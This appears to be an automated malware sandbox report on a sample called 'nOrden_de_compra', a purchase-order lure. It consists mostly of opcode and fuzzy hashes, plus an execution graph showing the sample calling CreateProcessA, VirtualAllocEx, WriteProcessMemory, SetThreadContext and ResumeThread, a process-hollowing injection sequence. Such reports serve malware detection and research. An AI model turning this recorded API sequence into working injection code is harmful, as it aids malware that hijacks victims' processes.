                                          • Opcode ID: 774eae68589be9d4be2572b0d5320f9ccc6b9474fd0f836322f3572a5638beb7
                                          • Instruction ID: f064b1fafa705fd609907d8a3b327b18cde0c0f24976147d7e8ea1121cf28c7d
                                          • Opcode Fuzzy Hash: 774eae68589be9d4be2572b0d5320f9ccc6b9474fd0f836322f3572a5638beb7
                                          • Instruction Fuzzy Hash: F1510D70B011169FEB54EF69D950B6EB7F6EB89600F108569D80AEF384EB35DC42CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1e0c1a20e9870844aa7130ad6187194f707733658b66c490a3dee0d8d9974726
                                          • Instruction ID: affe3d6ca16715f91ef985a0b7c058914a212a5acd7ac5db25bdc4f258f2aa78
                                          • Opcode Fuzzy Hash: 1e0c1a20e9870844aa7130ad6187194f707733658b66c490a3dee0d8d9974726
                                          • Instruction Fuzzy Hash: 95518070B102188BEF64B6F8D85473F395ED7C9390F205669E50AC3396CA69CC41C7A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 57326cffa85bae14898fdf04a94565bfb292550cb948257abba639d045935330
                                          • Instruction ID: 3441d3b292c859387c1f8217704d981d94433c4e958ae71286cc11cdd4b37167
                                          • Opcode Fuzzy Hash: 57326cffa85bae14898fdf04a94565bfb292550cb948257abba639d045935330
                                          • Instruction Fuzzy Hash: 29418F70B002199FDB54AFA9C854BAEBBF6FF88700F208529E505AB395DE719C05CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4574223e243f44522a66fdcd6aadf976eb0ab21a93f69d6dabb0799189ce2e95
                                          • Instruction ID: ee1e70160cd3fd5aae8c76f97ae6db8c0beee02aaf4462e870dc4920c0f810ea
                                          • Opcode Fuzzy Hash: 4574223e243f44522a66fdcd6aadf976eb0ab21a93f69d6dabb0799189ce2e95
                                          • Instruction Fuzzy Hash: A4417DB2E006099FDFB0DFA9D880BAFBBB2EB84310F14496AD255D7604D330E855CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 111a8b0ae0d08197287fbb5ccc3eba7ee773b8c4ec28683b8a6b64d3c553a64d
                                          • Instruction ID: 2aa5d60bdfbdbbfd3e4517608f52213989136d62162fecbe7aefa6603e3a7793
                                          • Opcode Fuzzy Hash: 111a8b0ae0d08197287fbb5ccc3eba7ee773b8c4ec28683b8a6b64d3c553a64d
                                          • Instruction Fuzzy Hash: 6E4191B0E0020ADFDB55EF75C4446AEBBB2FF85340F20456AE401EB281DBB19846CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 125aa8808d7599c4e2bc102950ae6fae906e37b4e00afc9e65d98a83a5bdea54
                                          • Instruction ID: fc3e702d3cd041df458c108bb20aa0a65b33979361840906c1e43fd5f4a9c521
                                          • Opcode Fuzzy Hash: 125aa8808d7599c4e2bc102950ae6fae906e37b4e00afc9e65d98a83a5bdea54
                                          • Instruction Fuzzy Hash: F2319A70B002068FDB58BB75D91466F7BA2EB89600F648568D406DB388EF39DD02CBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 193927f4eeea20fb46ff296e6f2d4d6ffe69c6a9e6c46350b61c0b54affe43e8
                                          • Instruction ID: dd8d77d732c6df632537d6ee8838c294bcf2b049bc71fe3e0c54802c74cbd94f
                                          • Opcode Fuzzy Hash: 193927f4eeea20fb46ff296e6f2d4d6ffe69c6a9e6c46350b61c0b54affe43e8
                                          • Instruction Fuzzy Hash: F3318070E10216DFDB59EFA5D89469EB7B2FF89300F208529E906E7350DB71AD42CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cf8b5d16d68c840a88f0c1230940f9fd5f433bcc14c7e0feb5b748cefd7efea7
                                          • Instruction ID: 3f55452c8a9126cc337c58a240af74d8a6f912686a6d0d3148acea8ece009116
                                          • Opcode Fuzzy Hash: cf8b5d16d68c840a88f0c1230940f9fd5f433bcc14c7e0feb5b748cefd7efea7
                                          • Instruction Fuzzy Hash: 55318170E10216DFDB59EFA4D85469EB7B2FF89300F208519E906E7350DB71AD42CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 112d6990b71b5481fdec30dd38ecb8288020c2012823ea3b9f112c7a48e09184
                                          • Instruction ID: 7c9290e33de06624840d2e680a1c4e68ca985e653c7a684ba6280eadc88bdc94
                                          • Opcode Fuzzy Hash: 112d6990b71b5481fdec30dd38ecb8288020c2012823ea3b9f112c7a48e09184
                                          • Instruction Fuzzy Hash: 4A217FB1F112159FDB50EFA9E840AAEBBF6EB48710F104165E905E7380D731D851CBE4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6a58d144188a4137948d28c6fa62f20a602286db884c9199d094a10e11805e64
                                          • Instruction ID: b7d1ec4d042a3be7e76e35b8dcbed3daeb20543ad5dde5400083c7a920e20c16
                                          • Opcode Fuzzy Hash: 6a58d144188a4137948d28c6fa62f20a602286db884c9199d094a10e11805e64
                                          • Instruction Fuzzy Hash: 76219DB5F112159FDB40EFA9E880AAEBBF5EB88710F108165E905EB380E731DC50CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4528843260.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_139d000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b3d6de60cb88187310cca6f38e863ba44fb9bceb0fa00a113a7ba2cffd7a5b82
                                          • Instruction ID: 9daaa6ae1525b37fc5ada3c46277d92f936defb9354cf846ebb20991908aa14f
                                          • Opcode Fuzzy Hash: b3d6de60cb88187310cca6f38e863ba44fb9bceb0fa00a113a7ba2cffd7a5b82
                                          • Instruction Fuzzy Hash: 6C2134B6504308EFDF15CF68C9C1B26BB65FB84318F20C56DE90A0B352C77AD846CA61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0b3dc4fc138a346d9f9c6bba50faba9e8c4f52cf98b2ae2914d065087d449d05
                                          • Instruction ID: 4523dad343091cc8b24091d9eda5b1162e0ceaf57170a4184d60b42d02bdb12a
                                          • Opcode Fuzzy Hash: 0b3dc4fc138a346d9f9c6bba50faba9e8c4f52cf98b2ae2914d065087d449d05
                                          • Instruction Fuzzy Hash: 6D118E31B1012A8FDB44EA69D8106AF73E6EBC9611B008579D906E7384EE66DC01CBD6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 62053e8be8d5712df0feadf0048d35ec8716d1b33b98fcd46683ae5b1b6ea45a
                                          • Instruction ID: de3efc52b6ec3f4930ca952804c9d2c3b7cdafd7b7a26ffbcca87d86305e8b05
                                          • Opcode Fuzzy Hash: 62053e8be8d5712df0feadf0048d35ec8716d1b33b98fcd46683ae5b1b6ea45a
                                          • Instruction Fuzzy Hash: 9F01D271F141620FDB65AABD9410B6FB7D6DBC6610F14896AD40AC7781D959CC02C390
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8a8b835b987e97ab333862529cb91caef86ea9911100327de9112bdbba2eeb6b
                                          • Instruction ID: a97eaa1332c9f25e789cfbbc5b7219b3b92bdda4837c886ad48c424a388b0122
                                          • Opcode Fuzzy Hash: 8a8b835b987e97ab333862529cb91caef86ea9911100327de9112bdbba2eeb6b
                                          • Instruction Fuzzy Hash: FE01B175B001919FDB61EABC9840B3F77DAEBC9750F148469F50ACB340DA6ADC028791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 63cc60426fa61f6c3e57c5cdd69df1d1f23d09f7eae71a1d4156af2edcd67a82
                                          • Instruction ID: 9eeda902cb7707b47c07d68744b00fa613fb3cf7706f9c014efdcf02519eddc8
                                          • Opcode Fuzzy Hash: 63cc60426fa61f6c3e57c5cdd69df1d1f23d09f7eae71a1d4156af2edcd67a82
                                          • Instruction Fuzzy Hash: 0801F7B0B102214FDB65E67DE860B2F77D6EB86710F10986AE00ADB791EA15DC42C781
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c433ac8c65f6e04fd8fbb5f879378c49dccf6f9ff9bacfdf95d88ecdac277e39
                                          • Instruction ID: 36f3048a2929c4351263c7fbb6ff1e3dd1a03168997eb1d5df5865ecf9380f82
                                          • Opcode Fuzzy Hash: c433ac8c65f6e04fd8fbb5f879378c49dccf6f9ff9bacfdf95d88ecdac277e39
                                          • Instruction Fuzzy Hash: 5C21B2B5D01259AFDB00DF9AD884A8EFBB8FB49620F50816AE518B7200C7746554CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4528843260.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_139d000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                          • Instruction ID: eec93a2f9fcced5a429b7549ea49a890769973b22bb4b994799216f187d6db5c
                                          • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                          • Instruction Fuzzy Hash: 6111DDB6504284CFCB12CF58C9C4B16BFA2FB84318F24C6A9D8494B352C33AD44ACF62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7a739ec4c58be466be953da33dd2f1fe6ab53e4a5d1acdf926cfcdc8c0533bdb
                                          • Instruction ID: 858af4d43d4915a7540f7a451a8cc04433816f986bb4ae5c9a9b52b9bbdb8f61
                                          • Opcode Fuzzy Hash: 7a739ec4c58be466be953da33dd2f1fe6ab53e4a5d1acdf926cfcdc8c0533bdb
                                          • Instruction Fuzzy Hash: 7801DF32B101264BDB84A969DC107AF77EBEBC9610F004979E90AE7384EF61CC12C7D6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ac9a39021cacb166a8b0d8989d0f259259d6841051aa864c48cae59c42686719
                                          • Instruction ID: 3da3683c7ced0b5bc7cb23b9512d54260bedb511494358a58d17733320865335
                                          • Opcode Fuzzy Hash: ac9a39021cacb166a8b0d8989d0f259259d6841051aa864c48cae59c42686719
                                          • Instruction Fuzzy Hash: 3811C0B5D01259AFDB00DF9AD884A8EFBB4FB48620F50812AE518A7200C374A554CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6c52c754a82c77373649d55e415d208a59666f573e7e265d74311414c9e858dc
                                          • Instruction ID: 393b5ea991b28805b4576d81cefebbe7f5322e8df52edea62ac637bfe5a8c245
                                          • Opcode Fuzzy Hash: 6c52c754a82c77373649d55e415d208a59666f573e7e265d74311414c9e858dc
                                          • Instruction Fuzzy Hash: 34016271B241224FDB64EAAD9410B2FB3DADBC5610F209979E50EC7784DD69DC02C395
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 355e5a0e1566ad247cbc8e3c019eb3c584dd729f04d506399de7201ecfb9651d
                                          • Instruction ID: 5d65f6c786fc4db4c1628fbd011f5d913853d2ec07616f58ca1364f4225955b6
                                          • Opcode Fuzzy Hash: 355e5a0e1566ad247cbc8e3c019eb3c584dd729f04d506399de7201ecfb9651d
                                          • Instruction Fuzzy Hash: 86016D75B001568FDB64FAAD9450B3FB3DAEBC9B60F109869F50AC7340DA69DC028791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1c668d34668dd5de5c414aa150cbb64ba61aed4b0ec216cfea64778c69d2928f
                                          • Instruction ID: 2f83e884ebbdac341b15f11c18228ed63d40c238f611f7971e0a28b72a11652f
                                          • Opcode Fuzzy Hash: 1c668d34668dd5de5c414aa150cbb64ba61aed4b0ec216cfea64778c69d2928f
                                          • Instruction Fuzzy Hash: A5018170B102214FDB64E66DE454B2F73D6DB8A620F109969E10ADB780EA25EC42C781
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a9c9748471d41db29d6c99e849f5490b4f0ca06686a3b5a3313113d2803fc385
                                          • Instruction ID: 82a513ec141708e459218ca412d5803b3ab6e9fd2e52e41e906c622574bbd64e
                                          • Opcode Fuzzy Hash: a9c9748471d41db29d6c99e849f5490b4f0ca06686a3b5a3313113d2803fc385
                                          • Instruction Fuzzy Hash: 5BF0A772E212349BDB14AA66EC006AAB73AF784350F104579D901E7244D771AC04CBD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 789047fea4f312023ce40c11fa64f57bf12a26e2bdfeaf2abba061b92660105e
                                          • Instruction ID: 668c5f5b0d290ff1ad0daa58d6ee585f0c565de16b405b1471cb365fffc2892b
                                          • Opcode Fuzzy Hash: 789047fea4f312023ce40c11fa64f57bf12a26e2bdfeaf2abba061b92660105e
                                          • Instruction Fuzzy Hash: 86F08CB6E10124CFDF74BA45EA402ACB7B5FB41312F9844E2E901EB194C331DE82DB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.4544956627.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_6b80000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3c5c2811b310dbd8062bed3da226252396b07e9eefbf85f980d6c144ab2c6a28
                                          • Instruction ID: c8d93222a26183f60c49a9a48c911f92fe0c12635256c16b2b4bb910aafb64e6
                                          • Opcode Fuzzy Hash: 3c5c2811b310dbd8062bed3da226252396b07e9eefbf85f980d6c144ab2c6a28
                                          • Instruction Fuzzy Hash: 66E092F1E182486FEB50DAB4D90575F7BADD742214F1445E5D404DB282F236CD41C351
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:10.8%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:0%
                                          Total number of Nodes:197
                                          Total number of Limit Nodes:9
                                          execution_graph 26567 f94668 26568 f9467a 26567->26568 26569 f94686 26568->26569 26571 f94778 26568->26571 26572 f9477c 26571->26572 26576 f94879 26572->26576 26580 f94888 26572->26580 26578 f9487c 26576->26578 26577 f9498c 26577->26577 26578->26577 26584 f944b4 26578->26584 26582 f948af 26580->26582 26581 f9498c 26581->26581 26582->26581 26583 f944b4 CreateActCtxA 26582->26583 26583->26581 26585 f95918 CreateActCtxA 26584->26585 26587 f959db 26585->26587 26587->26587 26588 6cd5e2f 26594 6cd81f6 26588->26594 26611 6cd8198 26588->26611 26627 6cd8188 26588->26627 26643 6cd8161 26588->26643 26589 6cd5de0 26595 6cd8184 26594->26595 26597 6cd81f9 26594->26597 26596 6cd8186 26595->26596 26660 6cd8809 26595->26660 26664 6cd8912 26595->26664 26669 6cd85b2 26595->26669 26674 6cd87d3 26595->26674 26678 6cd8a93 26595->26678 26682 6cd8857 26595->26682 26687 6cd8619 26595->26687 26692 6cd877f 26595->26692 26697 6cd8a3f 26595->26697 26703 6cd897c 26595->26703 26707 6cd8bdd 26595->26707 26711 6cd8c8a 26595->26711 26716 6cd866b 26595->26716 26596->26589 26612 6cd81b2 26611->26612 26613 6cd81d6 26612->26613 26614 6cd8809 2 API calls 26612->26614 26615 6cd866b 2 API calls 26612->26615 26616 6cd8c8a 2 API calls 26612->26616 26617 6cd8bdd 2 API calls 26612->26617 26618 6cd897c 2 API calls 26612->26618 26619 6cd8a3f 2 API calls 26612->26619 26620 6cd877f 2 API calls 26612->26620 26621 6cd8619 2 API calls 26612->26621 26622 6cd8857 2 API calls 26612->26622 26623 6cd8a93 2 API calls 26612->26623 26624 6cd87d3 2 API calls 26612->26624 26625 6cd85b2 2 API calls 26612->26625 26626 6cd8912 2 API calls 26612->26626 26613->26589 26614->26613 26615->26613 26616->26613 26617->26613 26618->26613 26619->26613 26620->26613 26621->26613 26622->26613 26623->26613 26624->26613 26625->26613 26626->26613 26628 6cd8189 26627->26628 26629 6cd8809 2 API calls 26628->26629 26630 6cd866b 2 API calls 26628->26630 26631 6cd8c8a 2 API calls 26628->26631 26632 6cd81d6 26628->26632 26633 6cd8bdd 2 API calls 26628->26633 26634 6cd897c 2 API calls 26628->26634 26635 6cd8a3f 2 API calls 26628->26635 26636 6cd877f 2 API calls 26628->26636 26637 6cd8619 2 API calls 26628->26637 26638 6cd8857 2 API calls 26628->26638 26639 6cd8a93 2 API calls 26628->26639 26640 6cd87d3 2 API calls 26628->26640 26641 6cd85b2 2 API calls 26628->26641 26642 6cd8912 2 API calls 26628->26642 26629->26632 26630->26632 26631->26632 26632->26589 26633->26632 26634->26632 26635->26632 26636->26632 26637->26632 26638->26632 26639->26632 26640->26632 26641->26632 26642->26632 26644 6cd816f 26643->26644 26645 6cd819d 26643->26645 26644->26589 26646 6cd81d6 26645->26646 26647 6cd8809 2 API calls 26645->26647 26648 6cd866b 2 API calls 26645->26648 26649 6cd8c8a 2 API calls 26645->26649 26650 6cd8bdd 2 API calls 26645->26650 26651 6cd897c 2 API calls 26645->26651 26652 6cd8a3f 2 API calls 26645->26652 26653 6cd877f 2 API calls 26645->26653 26654 6cd8619 2 API calls 26645->26654 26655 6cd8857 2 API calls 26645->26655 26656 6cd8a93 2 API calls 26645->26656 26657 6cd87d3 2 API calls 26645->26657 26658 6cd85b2 2 API calls 26645->26658 26659 6cd8912 2 API calls 26645->26659 26646->26589 26647->26646 26648->26646 26649->26646 26650->26646 26651->26646 26652->26646 26653->26646 26654->26646 26655->26646 26656->26646 26657->26646 26658->26646 26659->26646 26721 6cd56a8 26660->26721 26725 6cd56a0 26660->26725 26661 6cd882e 26665 6cd879f 26664->26665 26666 6cd87b4 26664->26666 26729 6cd4f38 26665->26729 26733 6cd4f33 26665->26733 26666->26596 26670 6cd85c0 26669->26670 26737 6cd583d 26670->26737 26741 6cd5840 26670->26741 26745 6cd54f8 26674->26745 26749 6cd54f7 26674->26749 26675 6cd87f4 26675->26596 26753 6cd4fe8 26678->26753 26757 6cd4fe7 26678->26757 26679 6cd8a3e 26679->26596 26683 6cd885d 26682->26683 26761 6cd55b8 26683->26761 26765 6cd55b7 26683->26765 26684 6cd888f 26684->26596 26688 6cd85b6 26687->26688 26690 6cd583d CreateProcessA 26688->26690 26691 6cd5840 CreateProcessA 26688->26691 26689 6cd86b9 26689->26596 26690->26689 26691->26689 26693 6cd879f 26692->26693 26695 6cd4f38 ResumeThread 26693->26695 26696 6cd4f33 ResumeThread 26693->26696 26694 6cd87b4 26694->26596 26695->26694 26696->26694 26698 6cd886e 26697->26698 26700 6cd86e1 26697->26700 26701 6cd55b8 WriteProcessMemory 26698->26701 26702 6cd55b7 WriteProcessMemory 26698->26702 26699 6cd888f 26699->26596 26700->26596 26701->26699 26702->26699 26705 6cd55b8 WriteProcessMemory 26703->26705 26706 6cd55b7 WriteProcessMemory 26703->26706 26704 6cd89af 26705->26704 26706->26704 26709 6cd4fe8 Wow64SetThreadContext 26707->26709 26710 6cd4fe7 Wow64SetThreadContext 26707->26710 26708 6cd876e 26709->26708 26710->26708 26713 6cd8710 26711->26713 26712 6cd8fab 26713->26711 26713->26712 26714 6cd55b8 WriteProcessMemory 26713->26714 26715 6cd55b7 WriteProcessMemory 26713->26715 26714->26713 26715->26713 26717 6cd85fe 26716->26717 26718 6cd85b0 26716->26718 26719 6cd583d CreateProcessA 26717->26719 26720 6cd5840 CreateProcessA 26717->26720 26718->26596 26719->26718 26720->26718 26722 6cd56f3 ReadProcessMemory 26721->26722 26724 6cd5737 26722->26724 26724->26661 26726 6cd56a8 ReadProcessMemory 26725->26726 26728 6cd5737 26726->26728 26728->26661 26730 6cd4f78 ResumeThread 26729->26730 26732 6cd4fa9 26730->26732 26732->26666 26734 6cd4f78 ResumeThread 26733->26734 26736 6cd4fa9 26734->26736 26736->26666 26738 6cd5840 CreateProcessA 26737->26738 26740 6cd5a8b 26738->26740 26742 6cd58c9 CreateProcessA 26741->26742 26744 6cd5a8b 26742->26744 26744->26744 26746 6cd5538 VirtualAllocEx 26745->26746 26748 6cd5575 26746->26748 26748->26675 26750 6cd54f8 VirtualAllocEx 26749->26750 26752 6cd5575 26750->26752 26752->26675 26754 6cd502d Wow64SetThreadContext 26753->26754 26756 6cd5075 26754->26756 26756->26679 26758 6cd4fe8 Wow64SetThreadContext 26757->26758 26760 6cd5075 26758->26760 26760->26679 26762 6cd5600 WriteProcessMemory 26761->26762 26764 6cd5657 26762->26764 26764->26684 26766 6cd55b8 WriteProcessMemory 26765->26766 26768 6cd5657 26766->26768 26768->26684 26528 f9ac70 26532 f9ad68 26528->26532 26540 f9ad57 26528->26540 26529 f9ac7f 26533 f9ad79 26532->26533 26534 f9ad9c 26532->26534 26533->26534 26548 f9aff1 26533->26548 26552 f9b000 26533->26552 26534->26529 26535 f9ad94 26535->26534 26536 f9afa0 GetModuleHandleW 26535->26536 26537 f9afcd 26536->26537 26537->26529 26542 f9ad5c 26540->26542 26541 f9ad9c 26541->26529 26542->26541 26546 f9aff1 LoadLibraryExW 26542->26546 26547 f9b000 LoadLibraryExW 26542->26547 26543 f9ad94 26543->26541 26544 f9afa0 GetModuleHandleW 26543->26544 26545 f9afcd 26544->26545 26545->26529 26546->26543 26547->26543 26549 f9aff4 26548->26549 26550 f9b039 26549->26550 26556 f9a0f0 26549->26556 26550->26535 26553 f9b014 26552->26553 26554 f9a0f0 LoadLibraryExW 26553->26554 26555 f9b039 26553->26555 26554->26555 26555->26535 26557 f9b1e0 LoadLibraryExW 26556->26557 26559 f9b259 26557->26559 26559->26550 26769 f9d650 DuplicateHandle 26770 f9d6e6 26769->26770 26771 f9d000 26772 f9d002 GetCurrentProcess 26771->26772 26774 f9d098 GetCurrentThread 26772->26774 26775 f9d091 26772->26775 26776 f9d0ce 26774->26776 26777 f9d0d5 GetCurrentProcess 26774->26777 26775->26774 26776->26777 26780 f9d10b 26777->26780 26778 f9d133 GetCurrentThreadId 26779 f9d164 26778->26779 26780->26778 26560 